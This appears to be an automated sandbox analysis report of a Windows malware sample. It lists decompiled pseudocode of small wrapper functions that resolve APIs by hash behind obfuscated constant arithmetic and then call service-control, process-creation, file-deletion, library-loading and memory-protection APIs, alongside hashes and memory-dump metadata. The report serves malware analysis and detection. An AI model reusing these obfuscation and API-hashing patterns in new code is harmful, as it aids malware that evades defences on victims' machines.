                        				_push(_a8);
                        				_push(_a4);
                        				_push(__edx);
                        				_push(__ecx);
                        				E1001DA49(_t26);
                        				_v16 = _v16 & 0x00000000;
                        				_v20 = 0x268f0d;
                        				_v8 = 0x1cc0;
                        				_t35 = 0x11;
                        				_v8 = _v8 / _t35;
                        				_v8 = _v8 >> 0xc;
                        				_v8 = _v8 ^ 0x00002b78;
                        				_v12 = 0xdacd;
                        				_v12 = _v12 | 0x08707abe;
                        				_v12 = _v12 ^ 0x0870d1a0;
                        				E10005C61(0x39413f62, 0x12a, 0x131a05a);
                        				_t33 = OpenServiceW(_a8, _t40, _t41); // executed
                        				return _t33;
                        			}
                        Instruction addresses: 0x10010f6f 0x10010f72 0x10010f74 0x10010f76 0x10010f79 0x10010f7c 0x10010f7d 0x10010f7e 0x10010f83 0x10010f89 0x10010f90 0x10010f9c 0x10010fa7 0x10010faa 0x10010fae 0x10010fb5 0x10010fbc 0x10010fc3 0x10010fda 0x10010fe7 0x10010fee

                        APIs
                        • OpenServiceW.SECHOST(00000000,?,?,?,?,?,?,?), ref: 10010FE7
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: OpenService
                        • String ID: b?A9$x+
                        • API String ID: 3098006287-3905361306
                        • Opcode ID: 5f25cdf5d72b9b157b1059a85f46f184f73fa6c1f9a94df05cdee3caed3e677b
                        • Instruction ID: 5e482b72b9fc1ef4f9dd550b6852b916541166715e4a37c12d879e622bc05068
                        • Opcode Fuzzy Hash: 5f25cdf5d72b9b157b1059a85f46f184f73fa6c1f9a94df05cdee3caed3e677b
                        • Instruction Fuzzy Hash: 8A017C75900208FBEB14EFD9CC0A8CEBFB5EF85315F108099F91867290D7B55B64ABA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E10016540(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                        				unsigned int _v8;
                        				signed int _v12;
                        				void* _v24;
                        				intOrPtr _v28;
                        				void* _t27;
                        				intOrPtr* _t34;
                        				void* _t35;
                        				signed int _t36;
                        				void* _t42;
                        
                        				_t42 = __edx;
                        				E1001DA49(_t27);
                        				_v28 = 0x620f5e;
                        				asm("stosd");
                        				_t36 = 0x6c;
                        				asm("stosd");
                        				asm("stosd");
                        				_v12 = 0x133f;
                        				_v12 = _v12 / _t36;
                        				_v12 = _v12 ^ 0x00001151;
                        				_v8 = 0x7686;
                        				_v8 = _v8 << 4;
                        				_v8 = _v8 >> 1;
                        				_v8 = _v8 ^ 0x0003dd25;
                        				_t34 = E10005C61(0x245757e3, 0x1e7, 0xbc6fde34);
                        				_t35 =  *_t34(_t42, 0, _a4, 0x28, 0, __edx, _a4, _a8, 0x28, _a16, _a20, _a24); // executed
                        				return _t35;
                        			}
                        Instruction addresses: 0x1001654b 0x1001655e 0x10016563 0x10016571 0x10016574 0x10016578 0x1001657e 0x1001657f 0x10016590 0x10016598 0x1001659f 0x100165a6 0x100165aa 0x100165ad 0x100165ba 0x100165ca 0x100165d1

                        APIs
                        • SetFileInformationByHandle.KERNELBASE(?,00000000,00001151,00000028,?,?,?,?,?,?,?,?), ref: 100165CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: FileHandleInformation
                        • String ID: WW$
                        • API String ID: 3935143524-2337609217
                        • Opcode ID: a6d088da77b8aced721c97028085f12f08c442a5c09021e5257d4aedb99ae776
                        • Instruction ID: 4c4ec864ed390e831fb990092291f9e2031f1e4e25354542dc6982a514d182d1
                        • Opcode Fuzzy Hash: a6d088da77b8aced721c97028085f12f08c442a5c09021e5257d4aedb99ae776
                        • Instruction Fuzzy Hash: 12018B35A41608FBEB05DF98DC06ECEBFB6EB48700F508094FA046A291C7B25B54DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E1000732D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				void* _t35;
                        				void* _t42;
                        				signed int _t44;
                        				void* _t49;
                        
                        				_push(_a20);
                        				_t49 = __ecx;
                        				_push(_a16);
                        				_push(_a12);
                        				_push(_a8);
                        				_push(_a4);
                        				_push(__ecx);
                        				E1001DA49(_t35);
                        				_v20 = _v20 & 0x00000000;
                        				_v16 = _v16 & 0x00000000;
                        				_v24 = 0x528569;
                        				_v8 = 0x6031;
                        				_v8 = _v8 + 0x1dc1;
                        				_v8 = _v8 << 0xf;
                        				_v8 = _v8 + 0x98b0;
                        				_v8 = _v8 ^ 0x3ef9c1b6;
                        				_v12 = 0x2915;
                        				_t44 = 0x21;
                        				_v12 = _v12 / _t44;
                        				_v12 = _v12 | 0x6f33eb00;
                        				_v12 = _v12 ^ 0x6f33d113;
                        				E10005C61(0xf0536f07, 0x107, 0xbc6fde34);
                        				_t42 = RtlAllocateHeap(_t49, _a12, _a20); // executed
                        				return _t42;
                        			}
                        Instruction addresses: 0x10007334 0x10007337 0x10007339 0x1000733c 0x1000733f 0x10007342 0x10007346 0x10007347 0x1000734c 0x10007352 0x10007356 0x1000735d 0x10007364 0x1000736b 0x1000736f 0x10007376 0x1000737d 0x10007389 0x10007394 0x10007397 0x1000739e 0x100073b5 0x100073c4 0x100073ca

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 100073C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 1`
                        • API String ID: 1279760036-3392566293
                        • Opcode ID: b7eb600688c6565edcf02888dd794f768ca7954795d797b8652bd397d62a2808
                        • Instruction ID: 39a193317f939250f5b44f46ec56d24ec03b42defc4e66ad5420ff7882869806
                        • Opcode Fuzzy Hash: b7eb600688c6565edcf02888dd794f768ca7954795d797b8652bd397d62a2808
                        • Instruction Fuzzy Hash: 4B112776D01218FBEF05DFD0C90AADEBFB1EF54315F148089F90066250D7B59B649B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 73%
                        			E1000CDA9(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* _t28;
                        				void* _t36;
                        				signed int _t38;
                        
                        				_push(_a12);
                        				_push(0);
                        				_push(_a4);
                        				_push(0);
                        				E1001DA49(_t28);
                        				_v12 = 0x649c;
                        				_t38 = 0x5c;
                        				_v12 = _v12 * 0x5c;
                        				_v12 = _v12 + 0xcd74;
                        				_v12 = _v12 + 0xffffbcd9;
                        				_v12 = _v12 ^ 0x0024844b;
                        				_v8 = 0x5c63;
                        				_v8 = _v8 + 0xfa66;
                        				_v8 = _v8 >> 1;
                        				_v8 = _v8 / _t38;
                        				_v8 = _v8 ^ 0x00000d7f;
                        				E10005C61(0x6619734a, 0x17b, 0x131a05a);
                        				_t36 = OpenSCManagerW(0, 0, _a4); // executed
                        				return _t36;
                        			}
                        Instruction addresses: 0x1000cdaf 0x1000cdb4 0x1000cdb5 0x1000cdb9 0x1000cdba 0x1000cdbf 0x1000cdce 0x1000cdd2 0x1000cdd5 0x1000cddc 0x1000cde3 0x1000cdea 0x1000cdf1 0x1000cdf8 0x1000ce05 0x1000ce0d 0x1000ce1f 0x1000ce2c 0x1000ce32

                        APIs
                        • OpenSCManagerW.SECHOST(00000000,00000000,0024844B), ref: 1000CE2C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: ManagerOpen
                        • String ID: c\
                        • API String ID: 1889721586-1842624324
                        • Opcode ID: 35937591655afac161ba036a707d809e48f6271fa47a247ad5e8474496e437c8
                        • Instruction ID: f4466ecdcc53f92f7fafc489d9fa87da10cfd842f9edec95dacaaec5af657488
                        • Opcode Fuzzy Hash: 35937591655afac161ba036a707d809e48f6271fa47a247ad5e8474496e437c8
                        • Instruction Fuzzy Hash: E2012575901608FFEB14DFD1C88A8DFBFB8EF45715F10818AE8086A290E7B55B509B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E1001B7A7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                        				unsigned int _v8;
                        				signed int _v12;
                        				void* _t27;
                        				int _t34;
                        				signed int _t36;
                        
                        				_push(_a12);
                        				_push(_a8);
                        				_push(_a4);
                        				E1001DA49(_t27);
                        				_v12 = 0xffce;
                        				_v12 = _v12 ^ 0x1c965c06;
                        				_v12 = _v12 << 2;
                        				_t36 = 0x13;
                        				_v12 = _v12 / _t36;
                        				_v12 = _v12 ^ 0x0604f35e;
                        				_v8 = 0x9c6;
                        				_v8 = _v8 | 0xef7fd198;
                        				_v8 = _v8 >> 0x10;
                        				_v8 = _v8 ^ 0x0000af1f;
                        				E10005C61(0x492cea6b, 0x15, 0x131a05a);
                        				_t34 = CloseServiceHandle(_a12); // executed
                        				return _t34;
                        			}
                        Instruction addresses: 0x1001b7ac 0x1001b7af 0x1001b7b2 0x1001b7b7 0x1001b7bc 0x1001b7c5 0x1001b7cc 0x1001b7d5 0x1001b7e0 0x1001b7e3 0x1001b7ea 0x1001b7f1 0x1001b7f8 0x1001b7fc 0x1001b810 0x1001b81b 0x1001b820

                        APIs
                        • CloseServiceHandle.SECHOST(?,?,?,?,?,?), ref: 1001B81B
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: CloseHandleService
                        • String ID: k,I
                        • API String ID: 1725840886-3352538913
                        • Opcode ID: b3eeda5c4ed2def4c2d269b5d0408d79bcde07b388a5e64ecef65320e8912d16
                        • Instruction ID: 4f5ec6c8ea8c8f9ae292986bb35cec93ba23287643d5a6f1b66afedcd7fc82e2
                        • Opcode Fuzzy Hash: b3eeda5c4ed2def4c2d269b5d0408d79bcde07b388a5e64ecef65320e8912d16
                        • Instruction Fuzzy Hash: 770128B290020CFBEF14DFD0C84689EBB75EB40300F10809DE5156B251D6B25B909B41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E100072C1(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* _t18;
                        				int _t23;
                        				WCHAR* _t28;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_push(_a4);
                        				_t28 = __ecx;
                        				_push(__ecx);
                        				E1001DA49(_t18);
                        				_v12 = 0xef64;
                        				_v12 = _v12 | 0x5cc273e3;
                        				_v12 = _v12 ^ 0x5cc2ac13;
                        				_v8 = 0xfcc8;
                        				_v8 = _v8 | 0x55374e86;
                        				_v8 = _v8 << 2;
                        				_v8 = _v8 << 0xd;
                        				_v8 = _v8 ^ 0xff675578;
                        				E10005C61(0x111a107e, 0x23a, 0xbc6fde34);
                        				_t23 = DeleteFileW(_t28); // executed
                        				return _t23;
                        			}
                        Instruction addresses: 0x100072c4 0x100072c5 0x100072c7 0x100072ca 0x100072cd 0x100072ce 0x100072d3 0x100072dd 0x100072e9 0x100072f0 0x100072f7 0x100072fe 0x10007302 0x10007306 0x1000731d 0x10007326 0x1000732c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: DeleteFile
                        • String ID: d
                        • API String ID: 4033686569-3778237843
                        • Opcode ID: 1266adab9469013f0afd2fbea3249ae616330f45d304632c74abfdd5ac787f32
                        • Instruction ID: 2aed4cb1dece676f15600213f3e02a13e566a16051c5f6cd73f79e2b7702838a
                        • Opcode Fuzzy Hash: 1266adab9469013f0afd2fbea3249ae616330f45d304632c74abfdd5ac787f32
                        • Instruction Fuzzy Hash: ABF09A35D02208FBEB14DBD0C98A8EEBF78EF01A84F108098E85463210DBB16F40DBD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E10014920(void* __ecx, void* __edx, WCHAR* _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* _t19;
                        				struct HINSTANCE__* _t26;
                        				signed int _t28;
                        
                        				_push(_a4);
                        				E1001DA49(_t19);
                        				_v12 = 0x4e6c;
                        				_v12 = _v12 + 0xffff9b57;
                        				_v12 = _v12 ^ 0xffffa248;
                        				_v8 = 0x624;
                        				_t28 = 0xd;
                        				_v8 = _v8 / _t28;
                        				_v8 = _v8 ^ 0x00007316;
                        				E10005C61(0x8b11820c, 0x143, 0xbc6fde34);
                        				_t26 = LoadLibraryW(_a4); // executed
                        				return _t26;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: lN
                        • API String ID: 1029625771-435509955
                        • Opcode ID: 87ab02a34ce4affac45c81db5b2fc537abfcab62053b9ddbcf1696dfedde1bec
                        • Instruction ID: e6f8fcc8720cb2d2c592f766cdf3da7c201aafb9a131478738a4e9a884b7e6c3
                        • Opcode Fuzzy Hash: 87ab02a34ce4affac45c81db5b2fc537abfcab62053b9ddbcf1696dfedde1bec
                        • Instruction Fuzzy Hash: 04F03AB1A00308FBEB14DFE4DC4699EBFB5EB90300F508199F9086B2A1D7B66F519B50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E10002B17(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* _t16;
                        				int _t21;
                        				struct _SHFILEOPSTRUCTW* _t26;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_push(_a4);
                        				_t26 = __ecx;
                        				_push(__ecx);
                        				E1001DA49(_t16);
                        				_v8 = 0xb9b;
                        				_v8 = _v8 | 0xf56bfeff;
                        				_v8 = _v8 + 0x5675;
                        				_v8 = _v8 ^ 0xf56c7979;
                        				_v12 = 0xa869;
                        				_v12 = _v12 + 0xb1c4;
                        				_v12 = _v12 ^ 0x00011777;
                        				E10005C61(0x49896e0f, 0x30, 0xfe955d23);
                        				_t21 = SHFileOperationW(_t26); // executed
                        				return _t21;
                        			}

                        APIs
                        • SHFileOperationW.SHELL32(?), ref: 10002B78
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: FileOperation
                        • String ID: uV
                        • API String ID: 3080627654-2442750861
                        • Opcode ID: de87c050a12aa41101e9ab9a7ebfbba5498e1d511ffb424979493e2267c05868
                        • Instruction ID: 2476c49a443dae8b8675b38e0c3a8be59998b16f2401ae187b9d4a8723b18ade
                        • Opcode Fuzzy Hash: de87c050a12aa41101e9ab9a7ebfbba5498e1d511ffb424979493e2267c05868
                        • Instruction Fuzzy Hash: 9CF09A72805308FBEB04DBC0D84A8DEBFB8EF01319F208088E8006B290E7B51F44CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E10003817() {
                        				signed int _v8;
                        				signed int _v12;
                        
                        				_v8 = 0xed11;
                        				_v8 = _v8 + 0xaef;
                        				_v8 = _v8 ^ 0x8d025d08;
                        				_v8 = _v8 + 0xffff2d16;
                        				_v8 = _v8 ^ 0x8d01a6db;
                        				_v12 = 0x5cac;
                        				_v12 = _v12 + 0xffff7e76;
                        				_v12 = _v12 ^ 0x27663cef;
                        				_v12 = _v12 ^ 0xd899f136;
                        				E10005C61(0xe650d89f, 0x24d, 0xbc6fde34);
                        				ExitProcess(0);
                        			}

                        APIs
                        • ExitProcess.KERNEL32(00000000), ref: 1000387B
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: ExitProcess
                        • String ID: <f'
                        • API String ID: 621844428-2424530120
                        • Opcode ID: 849826251e048e8e7f939794528d88b1198198bb39ce93ae1e784e12499691a6
                        • Instruction ID: 3499bbe4aa7a9740393d2c96346581557e29f089fbb929dfbd69fa3ac15089a2
                        • Opcode Fuzzy Hash: 849826251e048e8e7f939794528d88b1198198bb39ce93ae1e784e12499691a6
                        • Instruction Fuzzy Hash: 9CF03AB1D06348FFFB98CBE4D94A98EBA74EB10314F204188A055A2190E3711F159A51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2088409630.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E10012CFF(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* _v24;
                        				intOrPtr _v28;
                        				void* _t21;
                        				int _t28;
                        
                        				_push(_a12);
                        				_push(_a8);
                        				_push(_a4);
                        				E1001DA49(_t21);
                        				_v28 = 0x5cafc8;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				_v8 = 0x449c;
                        				_v8 = _v8 * 0x1e;
                        				_v8 = _v8 | 0x77ac1fee;
                        				_v8 = _v8 ^ 0x77ac4cfc;
                        				_v12 = 0x4c9d;
                        				_v12 = _v12 + 0x7e3d;
                        				_v12 = _v12 ^ 0x0000c98d;
                        				E10005C61(0x4f7d7a0e, 0x1d0, 0xbc6fde34);
                        				_t28 = CloseHandle(_a8); // executed
                        				return _t28;
                        			}

                        APIs
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,1000F4B8,00000000), ref: 10012D79
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: CloseHandle
                        • String ID: =~
                        • API String ID: 2962429428-2626422394
                        • Opcode ID: aab4d7573046a8be43c0b8137778bd9a6f0b0122852b87bd8b94487162b56cde
                        • Instruction ID: e43292a9dbc710b8564e87f1f34b31a6cc5d5816445325222bc2b5a62454ae41
                        • Opcode Fuzzy Hash: aab4d7573046a8be43c0b8137778bd9a6f0b0122852b87bd8b94487162b56cde
                        • Instruction Fuzzy Hash: A4014B7190120CFBEB00DFE9C94699EFFB5EF84304F608489E9146B161D7769B149B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E1001294D(long __edx, int _a4, struct _PROCESS_INFORMATION* _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, WCHAR* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, WCHAR* _a56) {
                        				signed int _v8;
                        				signed int _v12;
                        				struct _SECURITY_ATTRIBUTES* _v16;
                        				intOrPtr _v20;
                        				void* _t44;
                        				int _t53;
                        				signed int _t54;
                        				signed int _t55;
                        				long _t63;
                        
                        				_t63 = __edx;
                        				_push(0);
                        				_push(_a56);
                        				_push(_a52);
                        				_push(0);
                        				_push(_a44);
                        				_push(_a40);
                        				_push(_a36);
                        				_push(_a32);
                        				_push(0);
                        				_push(_a24);
                        				_push(_a20);
                        				_push(_a16);
                        				_push(_a12);
                        				_push(_a8);
                        				_push(_a4);
                        				_push(__edx);
                        				_push(0);
                        				E1001DA49(_t44);
                        				_v20 = 0x3239af;
                        				_v16 = 0;
                        				_v12 = 0xfa8d;
                        				_t54 = 0x16;
                        				_v12 = _v12 / _t54;
                        				_v12 = _v12 | 0x8b0a6119;
                        				_v12 = _v12 ^ 0x8b0a4594;
                        				_v8 = 0xcf07;
                        				_t55 = 0x19;
                        				_v8 = _v8 / _t55;
                        				_v8 = _v8 ^ 0x754979be;
                        				_v8 = _v8 ^ 0x754925fb;
                        				E10005C61(0xd2cfc7ea, 0xd3, 0xbc6fde34);
                        				_t53 = CreateProcessW(_a56, _a32, 0, 0, _a4, _t63, 0, 0, _a20, _a8); // executed
                        				return _t53;
                        			}

                        APIs
                        • CreateProcessW.KERNEL32(?,?,00000000,00000000,8B0A4594,00003A8F,00000000,00000000,00007501,?), ref: 10012A09
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 8c0651e5094ca53d30d44ba9d0758c6851cf9b1efa12cb51092056da4baa4289
                        • Instruction ID: 759f5ece550ec218662e272feee5b5b7f0cb765e03c1e6c30aec8430279ccf3c
                        • Opcode Fuzzy Hash: 8c0651e5094ca53d30d44ba9d0758c6851cf9b1efa12cb51092056da4baa4289
                        • Instruction Fuzzy Hash: 5821EF36900148FBDF159FE6DC06CDEBF76EB89750F108089FA1866160C3729A61EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        C-Code - Quality: 100%
                        			E10003D55() {
                        
                        				return  *[fs:0x30];
                        			}

                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090733634.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090733634.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 00000009.00000002.2092427375.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2092427375.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0015E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0015E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0015E770
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2095310547.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: fb304f36336920efae47d2530f91eb561b19b25896ede78ed6290884c2e3411c
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: F4B198B4E00109DFCB48CF94C591EAEB7B5BF88305F208159E919AB355D735EE86CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2095310547.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: 880592214337a7eec63fb713113ba210884b7e026eb7b2ea8e56b076bd43fb29
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
